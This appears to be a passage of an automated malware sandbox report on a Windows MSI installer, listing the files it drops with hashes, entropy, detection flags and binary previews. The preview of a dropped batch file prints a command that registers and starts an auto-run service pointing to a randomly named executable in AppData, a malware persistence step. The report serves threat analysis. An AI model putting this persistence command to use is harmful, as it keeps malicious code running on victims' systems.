Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv7.2.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	43405
Entropy (8bit):	7.995486194210034
Encrypted:	true
SSDEEP:	768:BW6N6duWjixltgJ/YtP0CFdNOek7IsT/KsQc7T5sFYBGdqxWMl6NPjAu:BW6UdAxltw0TNOt1T5kNdQWMENPj5
MD5:	038BD3AFC1C645309EA2AC8241FAEA4E
SHA1:	5994BCD83A0FFC73AC95C04E72A760E0CDE69AAA
SHA-256:	62EA1884D2CA67157D5B5706EA9ECB04CEAC87EE43C6F776849075D6EF77558C
SHA-512:	4EE4834975DCB18F0752FF82FE22E0E72BB658FA210088F8D29C7AE6BB0DDFC4D3CE624CD4CAE777429B32CA63997EFBAED87457A599D315C2314B6360E3C2B4
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv7.3.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	59084
Entropy (8bit):	7.997061813185959
Encrypted:	true
SSDEEP:	1536:BW6sdKNDauCui6bsn6ueXzMDGMw5AuOGt1K2qyuqdMUgOlKSo:oFdA+uzbTWwoGt1Hv3o
MD5:	EA95C5772F569691D94170C70962F47F
SHA1:	BC6FE7868B681FF643C78F7B02B2C79A7FF6D53E
SHA-256:	2F47E1C26AD874F6D7DB789195A379A6C48F0FD6C29CFE074A1B5EC5ECE975D5
SHA-512:	6475BDA81B9E27E6873794DDDF6118E36F7B7F5E47CECD682C078746B9ADDA5BDDBE8CAC63E794A0E63B3F1E53D946B70B0128795AD1B134D26D2246F19BCC41
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv7.4.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	81522
Entropy (8bit):	7.997658728209986
Encrypted:	true
SSDEEP:	1536:b3X4cXIoB/iOrydkB5xlW5mYiUBse73BnDPO/tGVI0zfJrNcO:zX4cJ7ydkB5mS8sm3BDG/0I0xcO
MD5:	C73202DDFB9FFDD67A33F1DACAB45698
SHA1:	64A4CF5CF5F44FEDA94DC39598D72A87E822AA90
SHA-256:	4605673AD3A8E30731A88C0AC09350B4691D6FFA035F7780213AA43A52625B1D
SHA-512:	A2FBAB8F0EF496286D83C915427021D393E5709C00244B051AD9785B028919FE8EC5A96E40597A94C95A79658F90229E59379FCDF4255AAE8C22706033D0BD2E
Malicious:	false
Preview:	.#D...e..,....<....`......./\.r49FHl#.:...\.2,....W_.{.Z..E.#.L..B[.z....S.N.....Z.On..eT-.m..t.%..K....Gc.y...r....FnD..a.....r.`.@.I...e91Y.bh.......F...~#..........Y.>.]X.O....d.d........3.FN.O.9a....[39.xdw..........C...h~..\|..Q...i.[...w.8.w.xz.....H....v.......e.OO.3..ul...y..3...`.C.,.1.P%.cw@...v..\ .......O&.M.....+..NI.0......5...y}..V...b..(_.l.).q{.in...dRL...mm...?[..Qjx."f"..]>..P.b..zl$?.f'h#z1...?..c.\|.0....... .>?.j..`<.o.S...+.\...U.l:._U.-.."c.#..g[.W.V)?<......&....kzR.2.....N....;-K...<aS.....1.Y....w..7k/y.MS.S..\|....W.9...q.U..d.0T.......;.l.......%..... %.T...l<...7.i(2]?......Y.....Ni...j..R...@....3....z...%..[.,..f..9].....B..'..jGN../.3....tF2.....4...I....C:Q6.....B.1Y..K..P@..J....:!....H......Z<..iC....l.p....\25].Se.A..#.D......i..........G[......)..I ..#[....Ln.O.W.']9..ht.p-...O.F.BAcK..Z......^.....K..`..-..1,.....j...e.v.>.l.{D.1"&..RV...0....M.X..0...~./...]..J.w...;.d....".....d6E..s.R<f.

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv8.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	99558
Entropy (8bit):	7.998126987043341
Encrypted:	true
SSDEEP:	1536:BW6i/7u5pOXNGa8SHdDghoUY5IxeOvcrLK82rYi0AH4THvDR6g6dRQ5c:ovz2IXoa8SahoUPxeOkrW82aZb7RIQ5c
MD5:	DA245CD9A3C4B3C3801D3AF51F65669E
SHA1:	B4CBF06B1741C6F11BFCB70AF71648E9CD303AFA
SHA-256:	4ED05DA6232A33F423440381F7537F81D7A191869F61CADD46503A6219F61956
SHA-512:	4D7085D14DA5A9801503F42BDA2B638DDC39D3F7B2DC4C0F19D4E1F24257906711CBE88C5B93398EB26731532E8C2D649E629DB32782DF41D8A8A293D0C3BC0C
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv8.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32921
Entropy (8bit):	7.994624642930536
Encrypted:	true
SSDEEP:	768:BW6NewJwOQjdH/VducqYXlA3KZQcd61iEntb8LGAv6kpUtk:BW6jJefPqYXa3KNdHEtb2Xv6kKk
MD5:	83F1BCCDC2F210D7DE086FC737916F39
SHA1:	9CDE2A6162D3DA680ABCE27F73014762F9F3ACAD
SHA-256:	B00A874071BAC257B2FD82634301D93F2EF93AD7B2B6FA4CA59081C674E58083
SHA-512:	DD1620B4445E53DEF839D461853CA5819624EC45CBB7794A7A564B5317BFBE2E0A4CCE29BCA3990599E2CC4D056889A0025AA70FDAE2851BBF3244B22F40BFA5
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv9.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	95672
Entropy (8bit):	7.99801011413176
Encrypted:	true
SSDEEP:	1536:BW6YIBIE5MDNsiGv7/8/ieUvSZZht/paxFn9UyFELTsX3wt2JIaG0Q1WWTRDdXLo:o5IBNMDOHvL8avSXht/U2yFELwXAO1Gk
MD5:	4B55B9B8CD72784B8F4E86594C976C38
SHA1:	153DC16E17AD981DA1B8A9D990E00061D54CD49E
SHA-256:	9E3F1E22A087D3714AFD5E5C25817CB5D92F9DD158DBD5995D7E7B7FA7963C0C
SHA-512:	87E0FF6C0B087BC060F7B6F9D5A514FDEAB835A1153FC6A01A6D36E9765F4B9335C5281CB9CC832F0117F11030A104AB113057EDB6861508F8229870686C2E34
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv9.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	30417
Entropy (8bit):	7.993108204768856
Encrypted:	true
SSDEEP:	768:BW6NHiPM2oCLwxHKaLMuIkdA/ceBdhiuP9vyRPMtoeVYbCluQ:BW6GLw418AjdvURPUYuv
MD5:	A227291090374BE07560BE98E820569E
SHA1:	79DE95ED367C987D0F2C009799E91C8D6EAD2127
SHA-256:	1BAC6A4DA0B8762762846D3828510696B82B9DACFC9341CF79A659863B328937
SHA-512:	21EFE5395D5CF59D60DABEAA2A6E83625571522EADD660C0EF1D599EBBEA5053ED381494EA46652CBD2AC994F09895F1249CC938F0BC42B28807815FE192F4BC
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\volume.dat

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	3837968
Entropy (8bit):	7.999950964389055
Encrypted:	true
SSDEEP:	98304:LMCeB3jTmrDYnk1L1ukkbCNlld3dWxUMV6VjwZU:LMCezTmri01rkuNlzQzU
MD5:	E675AB78BEB2521ECD33AC9D1D5CAC7E
SHA1:	0116F377966C27D045FADEB45C573F7D893A6619
SHA-256:	DB3C706993AD3217AC22EFC4171DCCF8A801C780623244429C88E642F7F32747
SHA-512:	E2F991C62C5247D5AD86A8E8F450FF9F4DF82DC8F8F4BB518730D5EF1D6C9FB500908346940D8B2F654B6034A12808C768855C8EAD689B7A03B199049D197FA2
Malicious:	false
Preview:	ff...X...k.r)....z]v..=O...p..f.. ..k;...Id...L!..=..^V....2K ..6.l..J..".@...s2\:!.Au....7....$. ....l.T.a...~...z.9.$....9.../=..H.X^..":?..G...K..T.....NFf....=.$.....;..t.K...Ho..R.....2........7.......3..'..e2.@.S2.4'BG. .n...g.m.(......+...?....H.\.~SF>3..1..aip.<..xw.d..sDSOB.Zg~.....M......1....Y.x...9..R.%`.N..V.{2..<kdiW......;..........c..f./M.H..s..d....M5.i....(`AY....+.[.7.?...".u.v..z(2M'U\|...)L.!.O.F..v..C.b(..n...c.._F......l.2...S...z.....(9..$+..[L.-O.SDqv04_<6N.\|.^.;W..........)FT.5.cm4...-.0<"..&..'X...G...mh8.\..S.JD....33....J-...z.r.E.g7.Z$[!...;.....6-4j..J_.;......-.+L........q.#..x <`.$...p.S>.]...._..8,.7]5:."X<W!....'0..^.?.-!..dU.hUp..B....k..7..;G...{.....%.?..C..Wz.....\|....<.'X...8....L.........B...M... .+c..&>.....X-ad......:.?..'...L.J.U.C.w0.%4.....\..)..T.b..T(Z.........F?\|.........G3iu..6.r=.a.$..)w.aOf.rm..!1...z...u......-`'.+lFRBn..<wR.%.;..s.2va...U...).;....{.y..$D;..M....9........<.N.N.J....(

C:\Users\user\Documents\microsoft.cmd

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	DOS batch file, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	376
Entropy (8bit):	3.5009610910379543
Encrypted:	false
SSDEEP:	6:QIcCNvKlLvtG8qmwY6lhXylg4TEN0V0Bnf2E3DYlfEKsyfMaKlLvVE3DAzYR:QIYjMNOlTEN0V0RuiEFujViZ
MD5:	0870ADDEA2A06011CB585BD56A0B7846
SHA1:	CD1120E599B0884E1D911BC895B455DC12AC11C8
SHA-256:	A4F875F169C9D93BDADE5677C915CD36524939493EBFC1EEE011DA4B125B2DCA
SHA-512:	360883ECADA8EE34D25F85F6D8D88DACFBA972F4E1670F35C9A1C278BA466D83F10411DAEBCA74B37B52007DA54963BDEEF8DC2510CB7A3EEA8228700F9D23E4
Malicious:	false
Preview:	..@.e.c.h.o. .o.f.f.....R.E.M. .-.-.-. .C.r.i.a.r. .o. .s.e.r.v.i...o. .-.-.-.....s.c. .c.r.e.a.t.e. .M.e.u.S.e.r.v.i.c.o. .b.i.n.P.a.t.h.=. .".%.a.p.p.d.a.t.a.%.\.d.e.f.e.n.d.r.\.L.K.d.a.y.a.n.J.E.L.T.9.Q.D.D.9.0.0.0.5.5...e.x.e.". .s.t.a.r.t.=. .a.u.t.o.....R.E.M. .-.-.-. .I.n.i.c.i.a.r. .o. .s.e.r.v.i...o. .-.-.-.....s.c. .s.t.a.r.t. .M.e.u.S.e.r.v.i.c.o.........e.x.i.t.

C:\Windows\Installer\58791b.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {36B01411-86F7-4A5B-B71C-E30003C2B666}, Number of Words: 10, Subject: Aplicativo Windows, Author: Microsoft, Name of Creating Application: Aplicativo Windows, Template: ;1046, Comments: Aplicativo Windows, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Aug 2 19:31:56 2024, Number of Pages: 200
Category:	dropped
Size (bytes):	24161280
Entropy (8bit):	7.971953576501129
Encrypted:	false
SSDEEP:	393216:GSG9qH2v09bLYik+rU9QmDbPK95lVuqtihjw+aLjvRpXFzhkf:/JPnkUw3a3VDp1zhk
MD5:	1F5F238E8FE77C8D8223C447D47AF966
SHA1:	D54CEF3A2624E20E1EA10D01A93C0CA315AE8D2B
SHA-256:	0845F3988ACE37D012B1838A5F56193BF46F9844BC7BE983C0BAA693527FD472
SHA-512:	C94A364F670B34CAB106612F3BB0511E940176D595662FBA1AD9B4D5DE7EF61D13BF2127268C5CEB20EAC3C66A0335E3A4C8B060B0022B568D7A7D51D2AF6CC0
Malicious:	false
Preview:	......................>...................q.......................'...........G.......c.......u...............................O...P...Q...R...S...T...U...V...W....................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...............<...............#...4........................................................................................... ...!..."...,...$...%...&...'...(...)...*...+...1...-......./...0...5...2...3...=...?...6...7...8...9...:...;...E...4...>...F...@...A...B...C...D...................I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI7BCB.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	601920
Entropy (8bit):	6.469032452979565
Encrypted:	false
SSDEEP:	12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
MD5:	CADBCF6F5A0199ECC0220CE23A860D89
SHA1:	073C149D68916520AEA882E588AB9A5AE083D75A
SHA-256:	42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
SHA-512:	CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: hBqTrQLya4.msi, Detection: malicious, Browse Filename: CrzA2u67LQ.msi, Detection: malicious, Browse Filename: HomeDesk.msi, Detection: malicious, Browse Filename: z1Pedido-Faturado-NF-938731.cmd, Detection: malicious, Browse Filename: arquivo.msi, Detection: malicious, Browse Filename: 25690.01808D.msi, Detection: malicious, Browse Filename: fatKCMAGKKH.msi, Detection: malicious, Browse Filename: SPMServer_2024.3.5.473.exe, Detection: malicious, Browse Filename: SPMServer_2024.2.1.7.exe, Detection: malicious, Browse Filename: SPMServer_2024.3.1.22.exe, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......\|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7C59.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	601920
Entropy (8bit):	6.469032452979565
Encrypted:	false
SSDEEP:	12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
MD5:	CADBCF6F5A0199ECC0220CE23A860D89
SHA1:	073C149D68916520AEA882E588AB9A5AE083D75A
SHA-256:	42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
SHA-512:	CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......\|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7C88.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	601920
Entropy (8bit):	6.469032452979565
Encrypted:	false
SSDEEP:	12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
MD5:	CADBCF6F5A0199ECC0220CE23A860D89
SHA1:	073C149D68916520AEA882E588AB9A5AE083D75A
SHA-256:	42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
SHA-512:	CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......\|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7CA9.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	601920
Entropy (8bit):	6.469032452979565
Encrypted:	false
SSDEEP:	12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
MD5:	CADBCF6F5A0199ECC0220CE23A860D89
SHA1:	073C149D68916520AEA882E588AB9A5AE083D75A
SHA-256:	42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
SHA-512:	CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......\|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7CF8.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	601920
Entropy (8bit):	6.469032452979565
Encrypted:	false
SSDEEP:	12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
MD5:	CADBCF6F5A0199ECC0220CE23A860D89
SHA1:	073C149D68916520AEA882E588AB9A5AE083D75A
SHA-256:	42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
SHA-512:	CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......\|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI7F79.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	866883
Entropy (8bit):	6.558498615861163
Encrypted:	false
